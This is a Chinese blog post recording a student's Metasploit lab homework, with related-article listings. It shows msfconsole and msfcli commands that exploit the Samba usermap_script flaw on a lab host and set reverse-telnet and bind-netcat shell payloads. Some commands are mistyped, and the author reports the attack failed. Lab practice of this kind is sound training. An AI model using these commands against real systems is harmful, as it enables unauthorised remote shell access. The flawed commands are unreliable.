metasploit魔鬼训练营第一章实践作业

最新推荐文章于 2024-04-18 20:09:38 发布
最新推荐文章于 2024-04-18 20:09:38 发布
阅读量2.3k 收藏 5
点赞数
分类专栏: 魔鬼训练营1 文章标签: 渗透测试 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lilywang20119/article/details/71158132
版权

1.搜索Samba服务usermap_script安全漏洞相关信息



根据下面的连接,搜索到如下内容:

The time line is as follows:

* May 7, 2007: Initial defect disclosure to the security@samba.org
  email alias.
* May 7, 2007: Initial developer response by Samba
  developer Gerald Carter.
* May 9, 2007: Patch released by Samba developer Jeremy
  Allison to iDefense for testing.
* May 10, Announcement to vendor-sec mailing list
* May 14, 2007: Public announcement of the security issue.

该漏洞的生命周期图,不会,略过

2.msfconsole 更新apt-get update

metasploit攻击模块路径:

dpkg -S metasploit
kali:/usr/share/metasploit-framework/modules/exploits
BT5:/opt/framework3/msf3/modules/exploits
linuxshell 统计针对windows2000 windowsxp。。。。目标环境的攻击模块数量(不知道)
 

 

3.运行metasploit完成对Linux靶机usermap_script攻击
 

kali: msfconsole
 

msf>show exploits
 

msf>use exploit/multi/samba/usermap_script 
 

 

msf> use exploit/multi/samba/usermap_script
msf> show options
msf> set RHOST 192.168.213.133
msf> exploit


 尝试使用VNC图形化远程控制工具的攻击载荷 

 

我的做法:
 

msf exploit(usermap_script) > show payloads
 

msf exploit(usermap_script) > set PAYLOADS cmd/unix/reverse_ssl_double_telnet 
 
 

msf exploit(usermap_script) > exploits
 
 

攻击失败了,但是流程应该是这样的????求解答
 

4.msfcli -h
 

msfconsole
 

msf>show payloads
 

msf>vim 1.attack.sh
 

 

 msfcli multi/samba/usermap_script PAYLOAD=/cmd/unix/bind_netcat   RHOST=$1 E 
 

msf>sh 1.attack.sh 192.168.213.133
 

 

 


 

                

        

        

    




    

      

        

            

              
                
                  lilywang20119
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    5
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
Kali Linux渗透测试实践——Metasploit与后门木马

				
			

			

				

					PICACHU+++的博客
				

				

					01-08
					
					2746
					
				

			

		

		

			
				
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

			
		

	



                

              
                



	

		

			

				
					
Metasploit魔鬼训练营》 第二、三章

				
			

			

				

					oldmoon的博客
				

				

					03-20
					
					966
					
				

			

		

		

			
				
目录

前言

一、靶场环境搭建

1.网络环境拓扑图

2.搭建过程中的 Q&A

(1)Kali2xface(NAT模式)

(2)metasploitable-Linux (桥接模式 + NAT模式)

(3)OWASP (NAT模式)

(4)Win2K3(NAT模式)

(5)WinXP (仅主机模式)

(6)一些问题

二、情报收集

1.流程图

2.外围信息收集

(1)搜索引擎

(2)metasploit辅助模块

(3)一些工具

心得

前言

在看《Web安全攻防--渗透

			
		

	



                


  
              

                


	

		

			

				
					
Metasploit魔鬼训练营第一章实践作业

				
			

			

				

					qq_39596232的博客
				

				

					03-31
					
					443
					
				

			

		

		

			
				
1、搜集Samba服务usermap_script安全漏洞的相关信息:

下面是Back Track 5上面提供的相关信息:



同时也可以参考下面的网站:




我在必应上找到的感觉介绍还不错的网站,也可以参考下:
https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script


2、该安全漏洞的生命周期图:
暂时不...

			
		

	





	

		

			

				
					
MetaSploit渗透测试魔鬼训练营》之环境搭建,2024年最新2024最新网络安全高频精选面试题讲解

					
最新发布

				
			

			

				

					m0_74535175的博客
				

				

					04-18
					
					1073
					
				

			

		

		

			
				
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!**注意:**DHCP设置中结束IP地址最后为255,否则后序端口扫描,254的那台会失败。其中,BT5太老了,都使用kali了,于是我换成了kali,接下来进行具体虚拟机的配置。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!对于从来没有接触过网络安全的同学,我们帮你准备了详细的。

			
		

	



		

			
		



	

		

			

				
					
Metasploit魔鬼训练营学习笔记 (1)第三章

				
			

			

				

					ClintSeven的博客
				

				

					04-05
					
					4266
					
				

			

		

		

			
				
metasploit 学习笔记第三章 

			
		

	





	

		

			

				
					
metsploit魔鬼训练营第一章作业

				
			

			

				

					sky
				

				

					06-04
					
					1332
					
				

			

		

		

			
				
实验一:通过攻击samba服务漏洞控制linux靶机
目标ip:192.168.232.134
metasploitable靶机下载地址:链接:http://pan.百度.com/s/1slHJcZV 密码:ndoj
实验环境:kali linux
kali:msfconsole 
msf > use exploit/multi/samba/usermap_script 

msf

			
		

	





	

		

			

				
					
metasploit魔鬼训练营第一章笔记

				
			

			

				

					电风
				

				

					05-17
					
					4051
					
				

			

		

		

			
				
利用metasploit攻击靶机 
kali自带metasploit 
LINUX下启动方式 
1.msfconsole 
2.cd /usr/share/metasploit-framework/ 
./msfconsole 
(自带更新程序) 
 
一.控制台形式 
(1)msfconsole进入控制台终端 
 
(2)msf>help search,MSF终端会显示该命令的参数列表,包括每个参

			
		

	





	

		

			

				
					
Metasploit渗透测试魔鬼训练营 读书笔记

				
			

			

				

					09-18
				

			

		

		

			
				
渗透测试-web渗透6.pdf  渗透测试-内网客户端渗透9.pdf  渗透测试-内网网络服务端渗透7.pdf  渗透测试-后渗透阶段10.pdf  渗透测试-实验拓扑环境4.pdf  渗透测试-情报搜集5.pdf  渗透测试-社会工程学8.pdf ...

			
		

	





	

		

			

				
					
Metasploit_测试魔鬼训练营.zip

				
			

			

				

					09-27
				

			

		

		

			
				
首本中文原创Metasploit渗透测试著作,国内信息安全领域布道者和资深Metasploit渗透测试...很多知识点都配有案例解析,更重要的是每章还有精心设计的“魔鬼训练营实践作业”,充分体现了“实践实践,再实践”的宗旨。

			
		

	





	

		

			

				
					
4.9、漏洞利用 smb-RCE远程命令执行

				
			

			

				

					c10udz的博客
				

				

					11-12
					
					2324
					
				

			

		

		

			
				
1.1 samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。1.2 SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器(C/S)型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。1.3 samba监听的端口。

			
		

	





	

		

			

				
					
metasploit 渗透测试魔鬼训练营 笔记(一) 配置环境

					
热门推荐

				
			

			

				

					qq_40476955的博客
				

				

					12-27
					
					1万+
					
				

			

		

		

			
				
PS:工欲善其事必先利其器
	渗透测试中,搭建渗透测试实验环境对于整个渗透测试项目相当重要。
在自主可控的实验环境中,先搭建虚拟机进行试验,再对真实目标进行实施,尽管看上去相当费劲,但实际上具有效率和可操作性。
	部署了完整的实验环境后,就可以开始实践之后的项目了。
	在文后附有 metasploit 渗透测试魔鬼训练营的 靶机镜像和源代码

			
		

	





	

		

			

				
					
Metasploit渗透测试魔鬼训练营

				
			

			

				

					qq_37340753的博客
				

				

					12-26
					
					8225
					
				

			

		

		

			
				
信息搜集外围情报搜集物理机有网状态下物理机无网状态下个人推测获取的信息主机探测与端口扫描活跃主机扫描ICMP Ping命令Metasploit的主机发现模块arp_sweep使用方法使用Nmap进行主机探测-sn选项扫描-Pn选项扫描-PU选项
外围情报搜集
物理机有网状态下

物理机无网状态下

个人推测
是由于需要向比较权威的DNS服务器访问,然后在相应的DNS服务器上读取相应的数据库,然后给...

			
		

	





	

		

			

				
					
Metasploit usermap_script漏洞相关笔记

				
			

			

				

					isinstance的博客
				

				

					12-06
					
					4662
					
				

			

		

		

			
				
usermap_script:CVE-2007-2447Samba用户名映射脚本命令执行这个模块利用漏洞执行命令,在Samba版本3.0.20到3.0.25rc3当使用非默认用户名映射脚本配置选项。 
通过指定一个用户名包含shell元字符,攻击者可以执行任意命令。 
不需要身份验证来利用此漏洞,因为此选项用于在身份验证之前映射用户名!模块的位置 
exploit/multi/samba/userm

			
		

	





	

		

			

				
					
Samba的usermap_script(CVE-2007-2447)漏洞整理

				
			

			

				

					野原新之助
				

				

					12-14
					
					1754
					
				

			

		

		

			
				
Username map script 是 Samba 协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行

			
		

	





	

		

			

				
					
Samba服务的username map script的漏洞相关信息

				
			

			

				

					橡皮
				

				

					12-21
					
					2303
					
				

			

		

		

			
				
1、Username map script 是什么- Samba协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行
- 影响Samba的3.0.20到3.0.25rc3 版本
- 当使用非默认的用户名映射脚本配置选项时产生
- 通过指定一个包含shell元字符的用户名,攻击者能够执行任意命令2、如何利用1、使用metasploit框架
2、使用模块:/multi/samba/userm

			
		

	





	

		

			

				
					
metasploit魔鬼训练营 环境搭建

				
			

			

				

					qq510381899的博客
				

				

					03-03
					
					3346
					
				

			

		

		

			
				
BT5         10.10.10.128OWASP   10.10.10.129WIN2K3   10.10.10.130ubuntu    10.10.10.254 (192.168.10.254)XP            192.168.10.128《Metasploit渗透测试魔鬼训练营》 下载镜像BT5R3-GNOME-VM-32_book_static_ipMetasploit...

			
		

	





	

		

			

				
					
Metasploit魔鬼训练营-自我实践记录】第3.3.2 口令猜测与嗅探--虚拟机实践

				
			

			

				

					mibunuo的专栏
				

				

					07-02
					
					1061
					
				

			

		

		

			
				
1.第96页 实践1 - SSH服务弱口令猜测按照书上代码清单3-23上的命令依次输入,却报错了,如下图: 
 
可以看出黄色框中提示找不到字典文件,因此输入exit退出msf,用命令find  / -name words.txt寻找名为words.txt的字典文件,结果如下: 
 
将找到的文件目录,填入 PASS_FILE,再次运行,如下所示: 
 
可以看到找到了字典文件,从而开始暴力破解2

			
		

	





	

		

			

				
					
Metasploit利用vnc图形化远程控制工具获得靶机远程控制桌面

				
			

			

				

					m0_46161993的博客
				

				

					07-01
					
					5274
					
				

			

		

		

			
				
问题描述
  分别在Windows和Linux操作系统上安装Metasploit软件,并运行Metasploit完成针对Linux靶机usermap_script漏洞的渗透攻击,尝试使用植入VNC图形化远程控制工具的攻击载荷,成功获得Linux靶机上的远程控制桌面。
  由于笔者没有配置Linux虚拟机,因此使用Windows XP SP3中文版作为靶机,并使用ms08_067作为渗透模块进行渗透。
解决办法
在msfconsole中使用命令:
use exploit/windows/smb/ms08_06

			
		

	





	

		

			

				
					
Metasploit学习笔记:Samba服务 usermap_script安全漏洞相关信息

				
			

			

				

					丶惊弦
				

				

					07-22
					
					2248
					
				

			

		

		

			
				
1、Username map script 是什么


- Samba协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行
- 影响Samba的3.0.20到3.0.25rc3 版本
- 当使用非默认的用户名映射脚本配置选项时产生
- 通过指定一个包含shell元字符的用户名,攻击者能够执行任意命令

2、如何利用


1、使用metasploit框架
2、使用模块:/multi/sa...

			
		

	





	

		

			

				
					
metasploit渗透测试魔鬼训练营

				
			

			

				

					09-03
				

			

		

		

			
				
### 回答1:
Metasploit渗透测试魔鬼训练营是一种针对渗透测试人员的培训课程,旨在帮助学员掌握使用Metasploit框架进行渗透测试的技能。该课程包括理论知识和实践操作,涵盖了Metasploit框架的基础知识、漏洞利用、后渗透等内容。通过参加该训练营,学员可以提高自己的渗透测试技能,为企业提供更加全面和有效的安全保障。  

### 回答2:
Metasploit渗透测试魔鬼训练营是一种专注于渗透测试技术的培训计划。Metasploit是一款广泛使用的渗透测试工具,能够帮助安全专业人士评估网络系统的弱点和漏洞,并提供相应的修复方案。Metasploit渗透测试魔鬼训练营旨在提供系统性的培训,使学员能够熟练运用Metasploit进行渗透测试,并成为专业的渗透测试人员。

这个魔鬼训练营采用实践与理论相结合的教学方法,通过大量的实际案例和模拟演练来帮助学员有效掌握渗透测试技术。训练营的内容包括Metasploit的基础知识、常见漏洞的挖掘与利用、渗透测试的方法与策略等。学员将学习如何利用Metasploit对目标网络进行扫描、漏洞利用和漏洞修复,以保证网络安全。

在这个训练营中,学员还将接触到实际渗透测试的场景和挑战,通过团队合作来解决复杂的安全问题。这不仅可以提高学员的问题解决能力,还可以培养他们的团队合作精神和沟通能力。

Metasploit渗透测试魔鬼训练营适合那些对渗透测试感兴趣,想要提升自己技能的安全专业人员。通过参加这个培训计划,学员可以全面了解Metasploit的功能与应用,并具备进行渗透测试的实际能力。这对于保护网络安全,提高企业的安全性具有重要意义。  

### 回答3:
Metasploit是一款著名的渗透测试工具,它被广泛用于评估网络系统的安全性和漏洞。Metasploit渗透测试魔鬼训练营是一个专门针对Metasploit工具进行训练和实践的培训班。

这个训练营的目的是让参与者全面了解Metasploit的功能和使用方法,并通过实际操作和挑战来提高他们的渗透测试技能。在训练中,学员将学习如何使用Metasploit来发现和利用目标系统中的漏洞,以及如何进行渗透测试和攻击模拟。这些实践活动将使学员更好地理解网络安全漏洞的本质和攻击者的行为方式。

Metasploit渗透测试魔鬼训练营的学习过程是非常实际的,学员将通过真实情景模拟来进行虚拟网络环境下的渗透测试。他们将学习如何选择和配置适当的漏洞利用模块,如何使用payloads以获取系统访问权限,并了解如何绕过防御机制和检测系统。

这个训练营的主要优势之一是培训者具有丰富的经验和专业知识,能够引导学员在实践中掌握Metasploit的各个方面。此外,训练营还提供了配套的学习资料和交互环节,使学员能够进一步加强他们的学习效果。

总而言之,Metasploit渗透测试魔鬼训练营是一个提供高质量Metasploit培训和实践机会的地方。通过参加这个训练营,学员可以提高他们的渗透测试技能,增强他们评估网络安全的能力,并为他们未来的职业发展打下坚实的基础。

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值